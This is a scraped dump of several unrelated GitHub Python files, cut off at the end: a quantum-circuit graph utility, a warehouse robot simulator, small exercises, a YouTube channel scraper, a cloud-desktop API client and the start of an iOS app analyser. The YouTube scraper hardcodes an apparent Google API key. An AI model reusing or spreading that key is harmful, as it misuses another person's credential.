executable_vertex \n '''\n DG = dependency_graph\n if executable_vertex == None:\n degree = DG.in_degree\n executable_nodes = []\n for i in degree:\n if i[1] == 0:\n executable_nodes.append(i[0])\n else:\n executable_nodes = executable_vertex\n for removed_vertex in removed_vertexes:\n if not removed_vertex in executable_vertex: raise Exception('removed node is not executable')\n candidate_nodes = DG.successors(removed_vertex)\n executable_nodes.remove(removed_vertex)\n executed_vertex.append(removed_vertex)\n #DG.remove_node(removed_vertex)\n for node in candidate_nodes:\n flag_add = True\n '''check whether this node is executable'''\n for pre_node in DG.predecessors(node):\n if not pre_node in executed_vertex:\n flag_add = False\n break\n if flag_add == True: executable_nodes.append(node)\n return executable_nodes\n\ndef AddLevelNumToDG(DG):\n '''\n Add level number to DG, this number can be obtained via\n DG.nodes[node][lev_num]\n '''\n executable_vertex = FindExecutableNode(DG)\n removed_vertexes = []\n executed_vertex = []\n lev_num = 0\n while len(executable_vertex) !=0:\n for node in executable_vertex:\n DG.nodes[node]['lev_num'] = lev_num\n removed_vertexes = executable_vertex.copy()\n executable_vertex = FindExecutableNode(DG,\n executed_vertex,\n executable_vertex,\n removed_vertexes)\n lev_num += 1\n \n\nif __name__ == '__main__':\n QASM_file = 'test3.qasm'\n path = 'C:/ProgramData/Anaconda3/Lib/site-packages/circuittransform/inputs/QASM example/'\n cir, res = CreateDGfromQASMfile(QASM_file, path, flag_single=True)\n DG, _ = res\n AddLevelNumToDG(DG)\n nx.draw(DG, with_labels=True)\n from cir_split import SplitDG\n res = SplitDG(DG,\n max_cut_cx=1,\n ini_part_A_qubits=[0, 1],\n ini_part_B_qubits=[2, 3, 4])\n print(res)","repo_name":"sanjinsanbai/EConTDD","sub_path":"cir_input/circuit_DG.py","file_name":"circuit_DG.py","file_ext":"py","file_size_in_byte":8333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23670398157","text":"from enum import Enum\nfrom numpy import sqrt\nfrom statistics import mean\n\n\nimport numpy\nimport yaml\nimport random\n\nfrom agent import Agent, Agent_State\nfrom order import Order, Order_State\n\n\nclass PickupStation():\n def __init__(self, coordinate):\n self.coordinate = coordinate\n\n def getCoordinate(self):\n return self.coordinate\n\n\nclass DeliveryStation():\n def __init__(self, coordinate):\n self.coordinate = coordinate\n\n def getCoordinate(self):\n return self.coordinate\n\n\nclass WareHouse_Env():\n\n def __init__(self, input_config_file, render=True):\n \"\"\"\n Creates a grid world of a warehouse, where multiples agents are supposed to collect items from pickup station\n and bring them to the delivery station. The Warehouse contains also obstacles\n\n :param input_config_file: yaml file that contains the word configuration\n \"\"\"\n # Load experiment parameters from the input.yaml file\n params = read_config_file(input_config_file)\n\n # Prepare for save the history to output.yaml file\n self.output = {\"schedule\": None}\n\n # Set the world grid\n self.dimensions = params[\"map\"][\"dimensions\"]\n self.map = numpy.zeros(self.dimensions, dtype=object)\n\n # Add pickupStation to list deliveryStation to the map\n self.pickupStations = []\n for pickupStation in list(params[\"map\"][\"pickupStation\"]):\n self.pickupStations.append(PickupStation(coordinate=pickupStation))\n\n # Add deliveryStation to list\n self.deliveryStation = DeliveryStation(coordinate=tuple(params[\"map\"][\"deliveryStation\"][0]))\n\n # Add obstacles to the map\n self.obstacles = []\n for obs in params[\"map\"][\"obstacles\"]:\n self.obstacles.append(obs)\n\n # Create agents\n self.agents = []\n for agentId, d in enumerate(params[\"agents\"]):\n agent = Agent(d[\"name\"], self.map, self.deliveryStation, position=tuple(d[\"start\"]))\n self.agents.append(agent)\n\n # Create Orders\n self.order_list = []\n # self.order_stats = []\n for i in range(len(params[\"order\"][\"orders_\"])): # Create as many orders as total_orders\n id_code = params[\"order\"][\"orders_\"][i][\"id_code\"]\n quantity = params[\"order\"][\"orders_\"][i][\"requested_quantities\"]\n timestep_begin = params[\"order\"][\"orders_\"][i][\"timestep\"]\n PickUP = params[\"order\"][\"orders_\"][i][\"pickupStation\"]\n order = Order(self.deliveryStation.getCoordinate(), PickUP[0], quantity, timestep_begin, id_code)\n print(\"ORDER\", order.id_code, order.pickupStation, \"quantity:\", order.requested_quantities, \"time_begin:\",\n order.timestep_begin)\n self.order_list.append(order)\n # self.order_stats.append(order)\n\n # Check if all agents are done\n self._done = False\n\n # Render in Terminal option\n self.renderMap(0)\n\n def step(self, timestep):\n\n # Assign orders to agents\n '''\n CNP: Orders are distributed here. Agent bid with distance to pickup station of order.\n '''\n for order in self.order_list:\n if order.get_order_state() == 0 and order.getTimestep_begin() <= timestep:\n winner = None\n winnerDistance = None\n for agent in self.agents:\n if agent.getState() == Agent_State._Done: # Agent is _Done\n distance = self.callForProposal(agent, order)\n if winner == None or distance < winnerDistance:\n winnerDistance = distance\n winner = agent\n if winner != None:\n winner.setOrder(order, timestep, winner.getId())\n for i in range(len(self.order_list)):\n if order.getOrderId() == self.order_list[i].id_code:\n self.order_list[i].agent_assigned = winner.getId()\n\n '''\n eCNP: All agents get orders proposed, also agent who already working on an order.\n '''\n for order in self.order_list: #to turn off eCMP comment it out\n if order.get_order_state() == 1 and order.getTimestep_begin() <= timestep:\n winner = None\n winnerDistance = None\n for agent in self.agents:\n if agent.getState() == Agent_State._Done or agent.getState() == Agent_State._Picking: # Agent is _Done\n distance = self.callForProposal(agent, order)\n if winner == None or distance < winnerDistance:\n winnerDistance = distance\n winner = agent\n if winner != None:\n winner.setOrder(order, timestep, winner.getId())\n for i in range(len(self.order_list)):\n if order.getOrderId() == self.order_list[i].id_code:\n self.order_list[i].agent_assigned = winner.getId()\n\n # Let agents make their moves\n for agent in self.agents:\n self.map[agent.getPosition()[0], agent.getPosition()[1]] = 0 # Reset position of agent\n agent.makesMove(timestep, self.map)\n self.renderMap(timestep)\n\n # Print for console\n self.renderMap(timestep, False)\n\n # Save history\n self.save_stepHistory()\n\n def callForProposal(self, agent, order):\n \"\"\"\n Return distance of agent to orders pickupstation\n TODO doesnt consider obstacles, solver should be used here.\n \"\"\"\n return sqrt((order.getPickupStation()[0] - agent.getPosition()[0]) ** 2 + (\n order.getPickupStation()[1] - agent.getPosition()[1]) ** 2)\n\n # Render stations\n def renderMap(self, timestep, printBool=False):\n \"\"\"\n Renders the map completely new everytime.\n \"\"\"\n\n # Render everything to zero\n self.map = numpy.zeros(self.dimensions, dtype=object)\n\n # Add obstacles\n for obs in self.obstacles:\n self.map[obs] = \"*\"\n\n # Add delivery station\n self.map[self.deliveryStation.getCoordinate()] = \"D\"\n\n # Add pickup stations\n for pickupStation in self.pickupStations:\n self.map[pickupStation.getCoordinate()] = \"P\"\n\n # Add agents\n for agent in self.agents:\n if self.is_in_P_station(agent):\n self.map[agent.getPosition()] = f\"P@A{agent.agentId}\"\n elif agent.getPosition == self.deliveryStation.getCoordinate():\n self.map[agent.getPosition()] = f\"D@A{agent.agentId}\"\n else:\n self.map[agent.getPosition()] = f\"A{agent.getId()}\"\n\n if printBool:\n print(\"#################\", timestep)\n print(self.map)\n\n def is_in_P_station(self, agent):\n for pickupStation in self.pickupStations:\n if pickupStation.getCoordinate() == agent.getPosition():\n return True\n return False\n\n def allOrdersDone(self):\n \"\"\"\n Return true if all orders are delivered\n \"\"\"\n for order in self.order_list:\n if order.get_order_state() != 3:\n return False\n return True\n\n def save_stepHistory(self):\n data = {}\n for agent in self.agents:\n data[agent.getId()] = agent.getStepsHistory()\n self.output[\"schedule\"] = data\n\n # Update env state to done if all agents are _Done and no more orders\n def everythingDone(self):\n \"\"\"\n End simulation if all orders had been delivered.\n \"\"\"\n if self.order_list != []:\n return False\n for agent in self.agents:\n # print(\"agent.state != Agent_State._Done\", agent.state, Agent_State._Done, agent.state != Agent_State._Done)\n if agent.state != Agent_State._Done:\n return False\n return True\n\n\ndef read_config_file(config_file):\n with open(config_file, 'r') as input_file:\n try:\n params = yaml.load(input_file, Loader=yaml.FullLoader)\n except yaml.YAMLError as exc:\n print(exc)\n return params\n\n\ndef write_output_file(output_file, output):\n with open(output_file, 'w') as output_yaml:\n yaml.safe_dump(output, output_yaml)\n\n\nif __name__ == \"__main__\":\n input_file = \"./input.yaml\"\n env = WareHouse_Env(input_config_file=input_file)\n timestep = 0\n while True:\n env.step(timestep)\n\n timestep += 1\n\n if timestep > 10000000 or env.allOrdersDone():\n print(\"Done with\", timestep, \"timesteps.\")\n break\n\n # Print results\n totallist = []\n deliverytimelist = []\n waitingtimelist = []\n for j in range(len(env.order_list)):\n E = env.order_list[j]\n print(\"Order;\", E.id_code, \"; agent\", E.agent_assigned, \"; agent pos:\", E.agent_pos, \"; pickup:\",\n E.pickupStation, \"; d_required:\", round(E.distance, 1), \"; t_begin:\", E.timestep_begin, \"; t_pick:\",\n E.timestep_pick, \"; t_end:\", E.timestep_end, \"; t_diff:\", (E.timestep_pick - E.timestep_begin),\n \"; d_performed:\", (E.timestep_end - E.timestep_pick), \"; loss:\",\n round((E.timestep_end - E.timestep_pick - E.distance), 2))\n\n # print(\"Order\", E.id_code, \" agent\", E.agent_assigned)\n # print(\"agent pos:\", E.agent_pos, \"pickup: \", E.pickupStation, \"distance: \", round( sqrt((E.agent_pos[0] - E.pickupStation[0])**2 + (E.agent_pos[1] - E.pickupStation[1])**2), 1))\n # print(\"quantity:\", E.requested_quantities, \" t_begin:\", E.timestep_begin)\n # print(\"t_begin:\", E.timestep_begin, \"t_pick:\", E.timestep_pick, \" t_end: \", E.timestep_end)\n # print(\"d_performed:\", (E.timestep_end - E.timestep_pick))\n # print(\"loss: \", round((E.timestep_end - E.timestep_pick - E.distance), 2))\n totallist.append(E.timestep_end - E.timestep_begin)\n waitingtimelist.append(E.timestep_pick - E.timestep_begin)\n deliverytimelist.append(E.timestep_end - E.timestep_pick)\n\n orderchangelist = []\n for agent in env.agents:\n i = 0\n for first, second in zip(agent.order_log, agent.order_log[1 : ] + agent.order_log[ : 1]):\n if (first != second):\n i = i + 1\n\n print(\"agent:\", agent.agentId, \", number of order-changes:\", agent.order_switchcount, ', unequal changes: ', i)\n orderchangelist.append(i)\n\n print('average order switches ' + str(mean(orderchangelist)))\n write_output_file(\"./output.yaml\", env.output)\n print(\" avg delivery: \" + str(mean(deliverytimelist)) + \" avg total: \" + str(\n mean(totallist)) + \" avg waitinglist: \" + str(mean(waitingtimelist)))\n filehandler = open('averagedeliverytimenow.txt', 'w')\n filehandler.write(str(mean(totallist)))\n","repo_name":"AmroBayoumy/Optimizing-Order-Delivery-in-a-multi-agent-warehouse-robot-system-using-Contract-Net-Protocol","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":10954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"6606127608","text":"import sys\nimport random\nimport string\n\nTEST_COUNT = 8\ndef get_random_string():\n WORDS = (\" cat\", \" jumble\", \" easy\", \" difficult\", \" answer\", \" xylophone\")\n length = random.randint(0, 1000)\n random_list = [ random.choice(WORDS) for _ in range(length) ]\n return \"\".join(random_list)\n'''\ndef get_random_string():\n length = random.randint(0, 16)\n random_list = [ random.choice(string.ascii_letters) for _ in range(length) ]\n return \"\".join(random_list)\n'''\ndef main():\n if len(sys.argv) != 2:\n print(f\"Usage: {sys.argv[0]} \")\n sys.exit(1)\n\n test_dir = sys.argv[1]\n\n lines = [0]\n lines.extend([ 10 ** i for i in range(TEST_COUNT) ])\n\n for enum, test_count in enumerate(range(1, TEST_COUNT+1)):\n test = []\n\n line_count = lines[enum]\n for _ in range(line_count):\n value = get_random_string()\n test.append(value)\n\n test_name = \"{}/{:02d}\".format(test_dir, test_count)\n with open(f'{test_name}.t', 'w') as ftest:\n for value in test:\n ftest.write(f'{value}\\n')\nmain()","repo_name":"IvaMarin/Discrete-Analysis","sub_path":"da_lab4/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24781209511","text":"# This is how you print the statement\r\nprint('Hello World')\r\n\r\n\"\"\"\r\nThis program is teaching you:\r\n1. How to add comments?\r\n2. How to print statement?\r\n3. How to declare variables?\r\n\"\"\"\r\n\r\na = input(\"Enter first number \")\r\nb = input(\"Enter second number \")\r\nc = a + b\r\nprint(c)\r\n","repo_name":"codestellar/learn-python","sub_path":"hello-world/hello-world.py","file_name":"hello-world.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33822576455","text":"###Titulo: Formação de uma terceira string\n###Função: Este programa lê duas strings e gera uma terceira string com as letras comuns a duas primeiras strings\n###Autor: Valmor Mantelli Jr.\n###Data: 07/01/2019\n###Versão: 0.0.1\n\n### Declaração de variáve \n\nf = \"\"\n\ns= \"\"\n\nt = \"\"\n\np = \"\"\n\n### Atribuição de valor \n\nf = \"AAACTBF\"\n\ns = \"CBT\"\n\n### Processamento\n\nfor p in f:\n\tif p in f and p in s: \n\t\n\t\tt += p\n\n### Saída\n\nif len (t) == 0:\n\tprint (\"Não existem letras comuns nas duas listas\")\nelse:\t\n\tprint (\"As letras comuns entre as variáveis %s e %s são %s\" % (f, s, t))\n\n\n\n","repo_name":"profnssorg/valmorMantelli1","sub_path":"exer702.py","file_name":"exer702.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71553574561","text":"from googleapiclient.discovery import build\r\nimport pandas as pd\r\n\r\nraw_data = {'title': [], 'channelTitle': [], 'tags': []}\r\ndf_marks = pd.DataFrame(raw_data)\r\n\r\napi_key = 'AIzaSyBJl7cgojKMu0-YDHJW6OWVbjwXWrxaQ7E'\r\n\r\nyoutube = build('youtube', 'v3', developerKey=api_key)\r\n\r\ndef getAllVideoData(channelId):\r\n\tglobal df_marks\r\n\r\n\tvid_ids = []\r\n\r\n\tch_request = youtube.channels().list(\r\n\t\tpart='snippet, contentDetails, statistics',\r\n\t\tid=channelId\r\n\t)\r\n\r\n\tch_response = ch_request.execute()\r\n\r\n\tfor item in ch_response['items']:\r\n\t\tmc_playlist_id = item['contentDetails']['relatedPlaylists']['uploads']\r\n\r\n\tnextPageToken = None\r\n\tpl_request = youtube.playlistItems().list(\r\n\t\tpart='contentDetails',\r\n\t\tplaylistId=mc_playlist_id,\r\n\t\tmaxResults=15,\r\n\t\tpageToken=nextPageToken\r\n\t)\r\n\r\n\tpl_response = pl_request.execute()\r\n\r\n\tfor item in pl_response['items']:\r\n\t\tvid_ids.append(item['contentDetails']['videoId'])\r\n\r\n\tvid_request = youtube.videos().list(\r\n\t\tpart=\"statistics, contentDetails, snippet\",\r\n\t\tid=','.join(vid_ids)\r\n\t)\r\n\r\n\tvid_response = vid_request.execute()\r\n\r\n\tfor item in vid_response['items']:\r\n\t\ttry:\r\n\t\t\tnew_row = {'title':item['snippet']['title'], 'channelTitle':item['snippet']['channelTitle'], 'tags':item['snippet']['tags']}\r\n\t\texcept:\r\n\t\t\tnew_row = {'title':item['snippet']['title'], 'channelTitle':item['snippet']['channelTitle'], 'tags':[]}\r\n\t\tdf_marks = df_marks.append(new_row, ignore_index=True)\r\n\r\ngetAllVideoData('UCe8K2OOoTmpm2u-1ec0fp0Q') # AprilSR\r\ngetAllVideoData('UC9HnCqLidC6nLktdUx-WXvA') # TheeSizzler\r\ngetAllVideoData('UCtNlOvqfBe8Rue4d7gXj9sQ') # Crafterdark\r\ngetAllVideoData('UCl05AQeLaOSjklP8SWpCdgg') # Four\r\ngetAllVideoData('UCpkC3VyoQK1zfwciiIYlvfw') # SpeedNintendo\r\ngetAllVideoData('UCqMazUQN-db8TmxnrZEA5KA') # k\r\ngetAllVideoData('UCTbC5qI5iZa0Q-F4LPla21Q') # Boscarvidios\r\ngetAllVideoData('UCcHyxtttXVEp-VaBtKp4wjw') # KaptainWutax\r\ngetAllVideoData('UC3AeCFbgCmdSPnQPJduDX3w') # Willz\r\ngetAllVideoData('UCv071F-VKI1V_UVVXiuyT-g') # randomidiot13\r\ngetAllVideoData('UCuu-Bu1hnwqq0xaK7pZ4OKw') # DKEN\r\ngetAllVideoData('UCSqDqnoPqg2VRUs8Jb7OvHw') # Renderedblue\r\ngetAllVideoData('UCsntFKaMT0NrGxjtpacC1cg') # pistacium\r\ngetAllVideoData('UCUOXKi6Byi57z0iob0bvNwA') # Cubing_Cinematics\r\ngetAllVideoData('UCh-nlS-qOHPXkDYYS1e5hEw') # MrMangoHands\r\n\r\ndf_marks.to_csv(r'D:/MinecraftYoutubeVideoData.csv')\r\n","repo_name":"jsnouffer/neo4j_db_project","sub_path":"src/youtube/MinecraftYoutubeVideoDataScraping.py","file_name":"MinecraftYoutubeVideoDataScraping.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27096645772","text":"RANK = 0\nCOUNTRY = 1\nELO = 2\nBYEAR = 3\n\n\ndef open_file(file_name):\n try:\n return open(file_name, \"r\")\n except FileNotFoundError:\n return None\n\ndef make_player_dict(file_obj):\n players_dict = {}\n for line in file_obj:\n line = line.strip().split(\"; \") # Split each element,\n player_ln, player_fn = line.pop(1).strip(\"\").split(\", \") # remove the players name from the list and save it as first name and last name \n players_dict[(player_fn + \" \" + player_ln)] = line # add to the dictionary the players along with their stats [Rank, country, elo, birth year]\n return players_dict\n\ndef make_dict_countries(players_dict):\n countries_dict = {}\n for player, stats in players_dict.items(): # Player: [stats]\n if stats[COUNTRY] in countries_dict: # If there is a player already from this country in this dict, add the new player\n countries_dict[stats[COUNTRY]].append(player)\n else: # Else add the country assigned with this player\n countries_dict[stats[COUNTRY]] = [player]\n return countries_dict\n\ndef print_sorted(dict_countries, players_dict):\n for country, players in sorted(dict_countries.items()):\n print(\"{} ({}) ({:.1f}):\".format(country, len(players), get_average_elo(players, players_dict))) # len(players) = the amount of players from that certain country, also get the average elo from that country\n for player in players:\n print(\"{:>40}{:>10d}\".format(player, int(players_dict[player][ELO]))) # print players and elo from a certain country\n\ndef get_average_elo(player_list, players_dict):\n ''' A Function that returns average elo from a certain list of players '''\n elo_sum = 0\n for player in player_list:\n elo_sum += int(players_dict[player][ELO]) # Get elo sum\n return (elo_sum/len(player_list)) # Retrun total sum divided by total amount of players in list\n\ndef main():\n file_name = input(\"Enter filename: Players by country:\\n\")\n print(\"-------------------\")\n file_obj = open_file(file_name)\n if file_obj: # If it is not empty\n players_dict = make_player_dict(file_obj)\n country_dict = make_dict_countries(players_dict)\n print_sorted(country_dict, players_dict)\n\nmain()","repo_name":"DongusJr/Verkefni_HR_2019_Haust","sub_path":"Assignments/Assignment_16/top_100_chess_part_1.py","file_name":"top_100_chess_part_1.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71894688481","text":"from django.urls import path\nfrom basic_app import views\n\n\n\n#TEMPLAT TAGGING: equal to application name\napp_name='basic_app'\n\nurlpatterns=[\n path('relative/',views.relative,name='relative'),\n\n # the url for above should be:http://127.0.0.1:8000/basic_app/relative/\n path('other/',views.other,name='other')\n\n]\n","repo_name":"bingyang-hu/Full-Stack-Web-Developer","sub_path":"learning_template/basic_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25499635875","text":"\nimport requests\nimport json\n\nclass cloudDesktopWrapper():\n def __init__(self):\n self.sessionID = ''\n self.user_id = ''\n self.user_password = ''\n self.host_ip = ''\n self.host_port = 80\n\n self.login_url = \"clc/api/1.0/user_login\"\n self.list_vm = \"clc/api/1.0/list_myvds\"\n self.create_url = \"clc/api/1.0/rvd/create\"\n self.start_url = \"clc/api/1.0/rvd/start\"\n self.prepare_url = \"clc/api/1.0/rvd/prepare\"\n self.progress_url = \"clc/api/1.0/rvd/getprogress\"\n self.run_url = \"clc/api/1.0/rvd/run\"\n self.stop_url = \"clc/api/1.0/rvd/stop\"\n self.vmstatus_url = \"clc/api/1.0/rvd/getvmstatus\"\n self.remove_task_url = \"clc/api/1.0/tasks/delete\"\n self.rdp_url = \"clc/api/1.0/rvd/get_rdp_url\"\n self.del_vm_url = \"clc/api/1.0/tasks/delete\"\n\n def setHost(self, ip, port=80):\n self.host_ip = ip\n self.host_port = port\n\n def setUser(self, user_id, user_password):\n self.user_id = user_id\n self.user_password = user_password\n\n def logon(self):\n url = 'http://%s:%s/%s' % (self.host_ip, self.host_port, self.login_url)\n payload = {\n 'email' : self.user_id,\n 'password' : self.user_password,\n }\n\n r = requests.post(url, data=payload)\n result = json.loads(r.content)\n\n if result['status'] == 'SUCCESS':\n self.sessionID = result['sid']\n return True\n else:\n return False\n\n # if sucess, return as belwo\n # {\n # 'Result' : 'OK',\n # 'data' : list of vms\n # }\n #\n # each vm in list looks like below:\n # {\n # 'ecid' : 'image id',\n # 'name' : 'image name',\n # 'ostype' : 'image os type',\n # 'desc' : 'image description',\n # 'tid' : 'transaction id',\n # 'phase' : 'transaction phase',\n # 'state' : 'transaction state',\n # 'mgr_url' : 'RDP access ip:port'\n # 'id' : 'index in list'\n # }\n #\n # if error, return as below\n # {\n # 'Result' : 'Failed',\n # 'error' : 'error message'\n # }\n def getVDList(self):\n url = 'http://%s:%s/%s' % (self.host_ip, self.host_port, self.list_vm)\n payload = {\n 'user': self.user_id,\n 'sid': self.sessionID,\n }\n\n r = requests.post(url, data=payload)\n result = json.loads(r.content)\n return result\n\n ###########################################################\n ##\n ## return :\n ## sucess : ['Result': 'OK', 'tid' : tid]\n ## failed : ['Result': 'FAIL', 'error' : error msg]\n ##\n ###########################################################\n def _create_tvd(self, vmdata):\n url = 'http://%s:%s/%s/%s' % (self.host_ip, self.host_port, self.create_url, vmdata['ecid'])\n payload = {\n 'sid': self.sessionID,\n }\n r = requests.post(url, data=payload)\n result = json.loads(r.content)\n return result\n\n def _parseTID(self, tid):\n _tmp = tid.split(':')\n return _tmp[0], _tmp[1], _tmp[2]\n\n ###########################################################\n ##\n ## return :\n ## sucess : ['Result': 'OK', 'tid' : tid]\n ## failed : ['Result': 'FAIL', 'error' : error msg]\n ##\n ###########################################################\n def _start_tvd(self, vmdata):\n tid = vmdata['tid']\n srcid, dstid, insid = self._parseTID(tid)\n\n url = 'http://%s:%s/%s/%s/%s/%s' % (self.host_ip, self.host_port, self.start_url, srcid, dstid, insid)\n payload = {\n 'sid': self.sessionID,\n }\n r = requests.post(url, data=payload)\n result = json.loads(r.content)\n return result\n\n def startVM(self, vmdata):\n if vmdata['tid'] == '':\n return self._create_tvd(vmdata)\n else:\n return self._start_tvd(vmdata)\n\n ###########################################################\n ##\n ## return :\n ## sucess : ['Result': 'OK', 'tid' : tid]\n ##\n ###########################################################\n def stopVM(self, vmdata):\n tid = vmdata['tid']\n srcid, dstid, insid = self._parseTID(tid)\n\n url = 'http://%s:%s/%s/%s/%s/%s' % (self.host_ip, self.host_port, self.stop_url, srcid, dstid, insid)\n payload = {\n 'sid': self.sessionID,\n }\n r = requests.post(url, data=payload)\n result = json.loads(r.content)\n return result\n\n\n ###########################################################\n ##\n ## return :\n ## sucess : ['Result': 'OK', 'tid' : tid]\n ## failed : ['Result': 'FAIL', 'error' : error msg]\n ##\n ###########################################################\n def prepareVM(self, vmdata):\n tid = vmdata['tid']\n srcid, dstid, insid = self._parseTID(tid)\n\n url = 'http://%s:%s/%s/%s/%s/%s' % (self.host_ip, self.host_port, self.prepare_url, srcid, dstid, insid)\n payload = {\n 'sid': self.sessionID,\n }\n r = requests.post(url, data=payload)\n result = json.loads(r.content)\n return result\n\n ###########################################################\n ##\n ## return = {\n ## 'type': 'taskstatus',\n ## 'phase': \"preparing\",\n ## 'state': 'downloading',\n ## 'progress': 0,\n ## 'tid': tid,\n ## 'prompt': '',\n ## 'errormsg': '',\n ## 'failed' : 0\n ## }\n ##\n ###########################################################\n def getPrepareProgress(self, vmdata):\n tid = vmdata['tid']\n srcid, dstid, insid = self._parseTID(tid)\n\n url = 'http://%s:%s/%s/%s/%s/%s' % (self.host_ip, self.host_port, self.progress_url, srcid, dstid, insid)\n r = requests.post(url)\n result = json.loads(r.content)\n return result\n\n ###########################################################\n ##\n ## return :\n ## sucess : ['Result': 'OK', 'tid' : tid]\n ##\n ###########################################################\n def runVM(self, vmdata):\n tid = vmdata['tid']\n srcid, dstid, insid = self._parseTID(tid)\n\n url = 'http://%s:%s/%s/%s/%s/%s' % (self.host_ip, self.host_port, self.run_url, srcid, dstid, insid)\n payload = {\n 'sid': self.sessionID,\n }\n r = requests.post(url, data=payload)\n result = json.loads(r.content)\n return result\n\n ###########################################################\n ##\n ## return = {\n ## 'type' : 'taskstatus',\n ## 'phase' : \"editing\",\n ## 'state' : 'stopped', 'booting', 'running' ,\n ## 'tid' : _tid,\n ## 'failed' : 0\n ## }\n ##\n ###########################################################\n def getVMStatus(self, vmdata):\n tid = vmdata['tid']\n srcid, dstid, insid = self._parseTID(tid)\n\n url = 'http://%s:%s/%s/%s/%s/%s' % (self.host_ip, self.host_port, self.vmstatus_url, srcid, dstid, insid)\n r = requests.post(url)\n result = json.loads(r.content)\n return result\n\n ###########################################################\n ##\n ## return :\n ## sucess : ['Result': 'OK', 'mgr_url' : rdp url]\n ##\n ###########################################################\n def getRDPUrl(self, vmdata):\n tid = vmdata['tid']\n srcid, dstid, insid = self._parseTID(tid)\n\n url = 'http://%s:%s/%s/%s/%s/%s' % (self.host_ip, self.host_port, self.rdp_url, srcid, dstid, insid)\n payload = {\n 'sid': self.sessionID,\n }\n r = requests.post(url, data=payload)\n result = (r.content)\n return json.loads(result)\n\n def delet_vm(self, vmdata):\n tid = vmdata['tid']\n\n url = 'http://%s:%s/%s/%s/%s/%s' % (self.host_ip, self.host_port, self.del_vm_url)\n payload = {\n 'tid': tid,\n }\n r = requests.post(url, data=payload)\n result = (r.content)\n return json.loads(result)\n\n def errorHandle(self, vmdata):\n self.delet_vm(vmdata)","repo_name":"liuyong240/eduCloud","sub_path":"webconfig/sdk/cloud-desktop/python/client_sdk.py","file_name":"client_sdk.py","file_ext":"py","file_size_in_byte":8369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18263592308","text":"import pytest\n\nfrom santa_helpers.neighbors import neighbors\n\nEXAMPLES_PARSE_GRID_TO_DICT = (\n ((1, 1), 4, None, None, {(0, 1), (1, 0), (2, 1), (1, 2)}),\n ((0, 0), 4, (0, 0), None, {(0, 1), (1, 0)}),\n ((0, 0), 4, (0, 0), (0, 0), set()),\n ((0, 0), 8, None, None, {\n (-1, -1), (0, -1), (1, -1),\n (-1, 0), (1, 0),\n (-1, 1), (0, 1), (1, 1),\n }),\n)\n\n\n@pytest.mark.parametrize(\n 'p,n,p_min,p_max,expected',\n EXAMPLES_PARSE_GRID_TO_DICT\n)\ndef test_parse_grid_to_dict(p, n, p_min, p_max, expected):\n assert set(neighbors(p, n, p_min, p_max)) == expected\n","repo_name":"lenarother/santa-helpers","sub_path":"tests/test_neighbors.py","file_name":"test_neighbors.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13234949283","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport json\nimport zipfile\nimport logging\nimport commands\nimport shutil\nimport subprocess\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nPWD = os.getcwd()\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(PWD))) # '/Users/bfy/Documents/python/fyBaiCrawler'\nsys.path.append(BASE_DIR)\n\n\nfrom fyBaiCrawler.utils.excel_utils import ExcelWriter\nfrom fyBaiCrawler.analyse.a25pp.ios_policy import *\n\n\nlogging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n filename=BASE_DIR + '/logs/25pp/anaylse.log',\n filemode='w'\n)\n\n\nclass AppAnaylse(object):\n FILE_NAME_FOR_DOWNLOAD_25PP = os.path.join(BASE_DIR, \"datas/25pp/25pp_apps_downloader.txt\")\n APPS_DIR = os.path.join(BASE_DIR, \"datas/25pp/apps\")\n\n app_column_id_2_name = {\n 1: \"影音娱乐\",\n 4: \"社交通信\",\n 2: \"系统工具\",\n 3: \"阅读学习\",\n 6: \"摄影美化\",\n 5: \"生活购物\",\n 7: \"出行导航\",\n 33: \"金融理财\",\n 8: \"运动健康\",\n 9: \"商务办公\"\n }\n\n sheet_head = (\"Apps\", \"下载链接\", \"友盟\", \"TalkingData\", \"Mixpanel\", \"GrowingIO\", \"神策\", \"诸葛\")\n\n def __init__(self):\n self.excel_writer = ExcelWriter(\"records.xls\")\n self.column_id_set = set()\n\n self.anaylse_policies = (FileNameAnaylse(), StringsPolicy())\n\n def anaylse(self, app_path, app_name, app_downurl, app_ranking, app_column_id):\n unzip_dir = os.path.join(os.getcwd(), app_name.replace(\"/\", \"_\"))\n status, output = commands.getstatusoutput('unzip -o \"{app_path}\" -d \"{unzip_dir}\"'.\n format(app_path=app_path, unzip_dir=unzip_dir))\n\n if status != 0:\n logging.warning(\"app - {app_path} unzip failed. --> {output}\".format(app_path=app_path, output=output[0: 200]))\n return unzip_dir\n\n payload_path = os.path.join(unzip_dir, \"Payload\")\n if not os.path.exists(payload_path):\n logging.warning(\"no Payload directory in this app - {app_path}\".format(app_path=app_path))\n return unzip_dir\n\n find_app_command = 'cd \"{payload_path}\" && ls -d */ | grep \"app\"'.format(payload_path=payload_path)\n app_dir = commands.getoutput(find_app_command)\n\n if not app_dir:\n logging.warning(\"no xxx.app in this app - 